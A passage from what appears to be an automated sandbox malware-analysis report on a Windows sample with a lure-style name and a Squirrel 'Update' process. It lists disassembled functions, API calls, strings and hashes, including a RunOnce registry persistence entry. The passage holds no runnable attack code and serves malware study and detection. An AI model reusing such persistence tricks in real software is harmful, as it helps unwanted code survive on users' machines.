                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ConditionMask$InfoVerifyVersion
                                                                    • String ID:
                                                                    • API String ID: 2793162063-0
                                                                    • Opcode ID: d7836b24db27386c36f4a64c4d35469f3d1ae12e11d5b8339d8be2b0806f4b78
                                                                    • Instruction ID: 8d19921bf7bcf0ae7ae71e2563216fc4ab992f3924ce0d07c66813c8c2f7ad48
                                                                    • Opcode Fuzzy Hash: d7836b24db27386c36f4a64c4d35469f3d1ae12e11d5b8339d8be2b0806f4b78
                                                                    • Instruction Fuzzy Hash: C2110D70E4031CAADB25DF66AC0AFDFBBBCEF85700F00409AA508A6291D6B44B458E95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0022C764 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0022C77E
                                                                      • Part of subcall function 0022C6CB: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0022C6FA
                                                                      • Part of subcall function 0022C6CB: ___AdjustPointer.LIBCMT ref: 0022C715
                                                                    • _UnwindNestedFrames.LIBCMT ref: 0022C793
                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0022C7A4
                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 0022C7CC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                    • String ID:
                                                                    • API String ID: 737400349-0
                                                                    • Opcode ID: e6e350666a2120b309a7001c651facae3f5a153cc18b9c02dd0ce685658859b6
                                                                    • Instruction ID: aaf3068637c9d7fb629e123ff52674640628a7ee46efef07b822eeb7ae7acbd5
                                                                    • Opcode Fuzzy Hash: e6e350666a2120b309a7001c651facae3f5a153cc18b9c02dd0ce685658859b6
                                                                    • Instruction Fuzzy Hash: 6E01C532510119BBDF126E95EC85DEF7B69EF88754F144114FA0856121C732E871AFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0023C8C5 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(?,?,?,00000000,?,?,0023B692,?,00000001,?,?,?,0023A0BC), ref: 0023C8DC
                                                                    • GetLastError.KERNEL32(?,0023B692,?,00000001,?,?,?,0023A0BC), ref: 0023C8E8
                                                                      • Part of subcall function 0023C8AE: CloseHandle.KERNEL32(FFFFFFFE,0023C8F8,?,0023B692,?,00000001,?,?,?,0023A0BC), ref: 0023C8BE
                                                                    • ___initconout.LIBCMT ref: 0023C8F8
                                                                      • Part of subcall function 0023C870: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0023C89F,0023B67F,?,?,0023A0BC), ref: 0023C883
                                                                    • WriteConsoleW.KERNEL32(?,?,?,00000000,?,0023B692,?,00000001,?,?,?,0023A0BC), ref: 0023C90D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 1fdc2ef932d12e7607b3443f0ef7678677ef7780504dde15dd81eec57fe24cf1
                                                                    • Instruction ID: b8021146f38b18264bd46351a66e6fb63a2b0c4daea6ed0ed53c9b22551c5e87
                                                                    • Opcode Fuzzy Hash: 1fdc2ef932d12e7607b3443f0ef7678677ef7780504dde15dd81eec57fe24cf1
                                                                    • Instruction Fuzzy Hash: B9F01C3A810115BBCF222F95FD09E9A3F76EB093A0F114020FA1995220C6328930EBD1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0023205C Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00232065
                                                                      • Part of subcall function 0023363A: HeapFree.KERNEL32(00000000,00000000,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?), ref: 00233650
                                                                      • Part of subcall function 0023363A: GetLastError.KERNEL32(?,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?,?), ref: 00233662
                                                                    • _free.LIBCMT ref: 00232078
                                                                    • _free.LIBCMT ref: 00232089
                                                                    • _free.LIBCMT ref: 0023209A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 8ebfdc91ed0b36038f5222fcc26f8c047fb234e1396ccf8ba1741f73fde66def
                                                                    • Instruction ID: 8fdead40c0ce9a1e2bbc7ea348659a816e40251f50c527348fb2c81e9099fbbb
                                                                    • Opcode Fuzzy Hash: 8ebfdc91ed0b36038f5222fcc26f8c047fb234e1396ccf8ba1741f73fde66def
                                                                    • Instruction Fuzzy Hash: 52E0BFBA420165AF8613AF2AFD0E8457E65F7AA7247010145F82512331C731C721AECD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00228465 Relevance: 5.4, APIs: 4, Instructions: 358stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(?,00247574,?,9E1BD041,?,?,?,?,?,0023E1C6,000000FF), ref: 002284E8
                                                                    • lstrcmpiW.KERNEL32(?,00247578,?,?,?,?,?,0023E1C6,000000FF), ref: 002284FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 1586166983-0
                                                                    • Opcode ID: fcd32aa0d6863d88576ed17e844d77d95f81fe7cb66fa49ff79469a63e1ca74c
                                                                    • Instruction ID: 52cd0e79e444ce1e348f2dddd3550e29c45435a568dd59e42274dd5627deebc6
                                                                    • Opcode Fuzzy Hash: fcd32aa0d6863d88576ed17e844d77d95f81fe7cb66fa49ff79469a63e1ca74c
                                                                    • Instruction Fuzzy Hash: 18D1E871D21239EBDB35DFA4EC84AEDB3B4AB18700F5400A6E609A7240DB70DEA5DF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0022A648 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0022AC4E
                                                                      • Part of subcall function 0022C3D9: RaiseException.KERNEL32(?,?,?,0022AC70,?,?,00000000,?,?,?,?,?,0022AC70,?,00248920), ref: 0022C439
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0022AC6B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                    • String ID: Unknown exception
                                                                    • API String ID: 3476068407-410509341
                                                                    • Opcode ID: cb68ed0285f330f2139cedbb3b592bdba4010f40f68f8dbdf8cdbcfc02f516f5
                                                                    • Instruction ID: 6c28607cae2dc6137f99a3643eb908268842014a27ad998dacc32a7f16a63fb5
                                                                    • Opcode Fuzzy Hash: cb68ed0285f330f2139cedbb3b592bdba4010f40f68f8dbdf8cdbcfc02f516f5
                                                                    • Instruction Fuzzy Hash: B6F0AF3493021EB78F14BAE8F806DAD736C5B10350BA08661B92596891EBB0DA3989D6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00221847 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006), ref: 0022189A
                                                                    Strings
                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00221868
                                                                    • SquirrelInstall, xrefs: 002218A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName
                                                                    • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$SquirrelInstall
                                                                    • API String ID: 514040917-3364363029
                                                                    • Opcode ID: b8c6b6d10e82cf41e4cf5f621fff4f72a1fd6db815eefb5de9fa3dbc3735dc67
                                                                    • Instruction ID: 724bc9ae1a3cf3238f3fc6b7e25027fcf93c5024083fcd9a6b853ed36d9e7300
                                                                    • Opcode Fuzzy Hash: b8c6b6d10e82cf41e4cf5f621fff4f72a1fd6db815eefb5de9fa3dbc3735dc67
                                                                    • Instruction Fuzzy Hash: E8016C71A5022CAFD714DF90EDC5EE9B378AB24300F5001A9A51592151DE705F588E41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    Function 00007FF848F20F18 Relevance: 18.4, Strings: 14, Instructions: 941COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$rT_H$wT_H
                                                                    • API String ID: 0-3823421185
                                                                    • Opcode ID: aecf3cddf46a9f7b005ffddd92b0b4d48dc98bbcce51c334378c9e0b2c07b01a
                                                                    • Instruction ID: c830e1a686a5b92082b2cc744ab4001ec95000c53b399e8a9b9735326e0d4e04
                                                                    • Opcode Fuzzy Hash: aecf3cddf46a9f7b005ffddd92b0b4d48dc98bbcce51c334378c9e0b2c07b01a
                                                                    • Instruction Fuzzy Hash: 25422631F1D90A4FE658A76CA8552B9B3D1FF947A0F14067AD44EC32C6DF3AA8038385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F4694D Relevance: 8.2, Strings: 6, Instructions: 725COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH$HAH$HAH$HAH
                                                                    • API String ID: 0-381444693
                                                                    • Opcode ID: 5a6c0b392d6e6b4133b5836d5b86bec36d8d92e55ff47e41fce3000e49042aa5
                                                                    • Instruction ID: f02221c559a1440229d83475326584881a6fa44e839a976d93941094359df3ec
                                                                    • Opcode Fuzzy Hash: 5a6c0b392d6e6b4133b5836d5b86bec36d8d92e55ff47e41fce3000e49042aa5
                                                                    • Instruction Fuzzy Hash: 2622B231B1CA094FE798EB2C9495675B3D2FFA8B50F04457AD44EC32D6EE2CAC428B45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F20F25 Relevance: 2.9, Strings: 2, Instructions: 414COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 3N_^$4N_^
                                                                    • API String ID: 0-2923934511
                                                                    • Opcode ID: 883d3b7e2ddd8cd4c50ece63c6aaf0b9079ca8e343d78f4d73783e4f4096f50d
                                                                    • Instruction ID: 5825103f5bf1b14b091c8ea66a3844a00bf347e180a92b7bb83c19814c352cd1
                                                                    • Opcode Fuzzy Hash: 883d3b7e2ddd8cd4c50ece63c6aaf0b9079ca8e343d78f4d73783e4f4096f50d
                                                                    • Instruction Fuzzy Hash: 33C1D93791F5625BD351B7BCB8911E67BA0EF413BDB0842B7D1C88D093DE1C648682A9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F4337D Relevance: 1.2, Instructions: 1160COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a1782ece677d1f96a2e337387897ff341d16b914cf65c800dd474931581edea0
                                                                    • Instruction ID: 412c5901629ebdf570e95b6fc30cb40d10dcc4981ac9dec0208f4100a352d809
                                                                    • Opcode Fuzzy Hash: a1782ece677d1f96a2e337387897ff341d16b914cf65c800dd474931581edea0
                                                                    • Instruction Fuzzy Hash: CC82B070A28B498FD368DF1CC481971B7E1FB64714B24466EC48BC7A96DB35F8838B85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F22000 Relevance: 11.6, Strings: 9, Instructions: 355COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH
                                                                    • API String ID: 0-3520357160
                                                                    • Opcode ID: 62a909d51341f7c19ec354d7f7001cbc3c0fd4bf116dee0ee15228a050b7874e
                                                                    • Instruction ID: 7c9398fb3764d81742e3a9c9ea3c4a149e73ea527bc659dabb3b575dc9d1fa8d
                                                                    • Opcode Fuzzy Hash: 62a909d51341f7c19ec354d7f7001cbc3c0fd4bf116dee0ee15228a050b7874e
                                                                    • Instruction Fuzzy Hash: 70A1C232E1DA4A4FF2A8E76C64556B5A3D2FF98790F44057AD40EC32C6DF2EAC428345
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F41675 Relevance: 10.6, Strings: 8, Instructions: 550COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH
                                                                    • API String ID: 0-4024470385
                                                                    • Opcode ID: 874ef118f55312557ca6a014896a3ae9c36e51cbd69ecc26021e13c659984a02
                                                                    • Instruction ID: fc92ff9fa0f672efc0a575ecceff4ff992e79fc987833917353c90244dc744d1
                                                                    • Opcode Fuzzy Hash: 874ef118f55312557ca6a014896a3ae9c36e51cbd69ecc26021e13c659984a02
                                                                    • Instruction Fuzzy Hash: 4C02D331E1CA6A4FE7A8EB28945527573D1FF68B81F14017EC44ED32D6EF28AC828745
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F47611 Relevance: 9.2, Strings: 7, Instructions: 430COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8cI$8cI$XhI$fI$fI$fI$fI
                                                                    • API String ID: 0-2545830573
                                                                    • Opcode ID: 340cff3d1de00bf4fd40a7e9f29b59625dfadf88388c5ea4f757eb6b1e41288e
                                                                    • Instruction ID: cf9ff681481e03dae5f62b066d33a24bdf29be79a3fecacdcad3df09e68474ae
                                                                    • Opcode Fuzzy Hash: 340cff3d1de00bf4fd40a7e9f29b59625dfadf88388c5ea4f757eb6b1e41288e
                                                                    • Instruction Fuzzy Hash: 60C1E431A1DD8E5FEB99EB2C98556757BD1FF64B80F0401BAD049D72D2EF28E8028385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F34C64 Relevance: 9.1, Strings: 7, Instructions: 357COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH$HAH$HAH$HAH$TS_H
                                                                    • API String ID: 0-751973228
                                                                    • Opcode ID: 7e7af13ca76e73a643c377e92bc69c5a4197c7c5cb737ac49bdb789f11c4e1ca
                                                                    • Instruction ID: 6c05588525d9c17c5f971230cce9d72e7a00d12c780fbf5616cefdc94db304a7
                                                                    • Opcode Fuzzy Hash: 7e7af13ca76e73a643c377e92bc69c5a4197c7c5cb737ac49bdb789f11c4e1ca
                                                                    • Instruction Fuzzy Hash: 9891F472F1CD4A0FE699B76C64552B927D2EBA8790F0801BBD40DC32C7DF186C424385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F31969 Relevance: 6.1, Strings: 4, Instructions: 1096COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH$HAH
                                                                    • API String ID: 0-4204409433
                                                                    • Opcode ID: 83e39a8d8bfa7b55b5973b6f6bbe1b9511561a73129b1bceed11e6e54277ece8
                                                                    • Instruction ID: b65c2105d5da874c5e4e4a9fcbd6784a07c61e3e1bf58ad6afec176a2b1af53c
                                                                    • Opcode Fuzzy Hash: 83e39a8d8bfa7b55b5973b6f6bbe1b9511561a73129b1bceed11e6e54277ece8
                                                                    • Instruction Fuzzy Hash: A6520632F1DE4A4FE798AB2C68561B537D1EF95791F0401BBE40DC32D7EE19AC428289
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F2B07D Relevance: 5.7, Strings: 4, Instructions: 658COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH$HAH
                                                                    • API String ID: 0-4204409433
                                                                    • Opcode ID: b9c36d831d2c3471223f86de3f7296458dbe172d4c332fbd78f5c8807f38c6b0
                                                                    • Instruction ID: 89a446fde2ca3f05db5e0c61b9e4cf5a5ebedf80bf3aa9d6fbbc8b90de20ec15
                                                                    • Opcode Fuzzy Hash: b9c36d831d2c3471223f86de3f7296458dbe172d4c332fbd78f5c8807f38c6b0
                                                                    • Instruction Fuzzy Hash: F0120631B2D90A8FE789EB2CA45567977E2EF98790F4401B9D80DC72D7DF29AC428341
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F398C8 Relevance: 5.4, Strings: 4, Instructions: 415COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0L_H$HAH$HAH$HAH
                                                                    • API String ID: 0-3043615716
                                                                    • Opcode ID: d711790f2201ba8bb9e7fdb8438b45cb81c05a328202c0e9a20159d8d0fbb6b3
                                                                    • Instruction ID: 7f7db13709db41ac3c667010e33b123d90150ac01f40ecfe4b3bc6c2eb857965
                                                                    • Opcode Fuzzy Hash: d711790f2201ba8bb9e7fdb8438b45cb81c05a328202c0e9a20159d8d0fbb6b3
                                                                    • Instruction Fuzzy Hash: AEC1E431A1CA4A4FE798EB2CE4566B577D1EF95390F0401BAD84EC32D7DF29AC428784
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F23A69 Relevance: 5.2, Strings: 4, Instructions: 204COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH$M_H
                                                                    • API String ID: 0-2995457226
                                                                    • Opcode ID: bc9d762487d9488d784ec68948560391a55a074f365ebd83453efdea5ea90e5c
                                                                    • Instruction ID: d7225968a5f0ae03dfec482f79dd53cd7c59bf0d48062af16bcd4adfcccd88ee
                                                                    • Opcode Fuzzy Hash: bc9d762487d9488d784ec68948560391a55a074f365ebd83453efdea5ea90e5c
                                                                    • Instruction Fuzzy Hash: 13510271A0DA8A4FE794EB2C9459675B7E2FF95350F1801FAC00DC71E2DB29AC468781
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F20E30 Relevance: 4.2, Strings: 3, Instructions: 449COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$M_H
                                                                    • API String ID: 0-3926399427
                                                                    • Opcode ID: 49da81c366e562daadc4fc424e0db13e83b4b3c6b93c848894c497a9f1ec0507
                                                                    • Instruction ID: 3bc03335baa31f56bf476a82ec5eb970e880d5053640a6dab3444e085bed0d0f
                                                                    • Opcode Fuzzy Hash: 49da81c366e562daadc4fc424e0db13e83b4b3c6b93c848894c497a9f1ec0507
                                                                    • Instruction Fuzzy Hash: 6BD1CF3161DA098FD798EB2CE459A6577E2FF99350B1001BED04DC72A6DF2AEC82C741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F300DA Relevance: 4.1, Strings: 3, Instructions: 395COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH
                                                                    • API String ID: 0-2719557456
                                                                    • Opcode ID: a9997a5f33126638d315ab2b36407ed7ecf6620ecac32f5466539b2a878c7904
                                                                    • Instruction ID: a618b0b1b755681dbbff61115489ebcef69b0cb7a34dd1b8ce20ec2c82b84a49
                                                                    • Opcode Fuzzy Hash: a9997a5f33126638d315ab2b36407ed7ecf6620ecac32f5466539b2a878c7904
                                                                    • Instruction Fuzzy Hash: 84A12A32E0DD8A4FE799B72CA8552B977D1EF95695F0802BBC44DC71C3DE18AC068294
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F3C7E0 Relevance: 4.1, Strings: 3, Instructions: 369COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
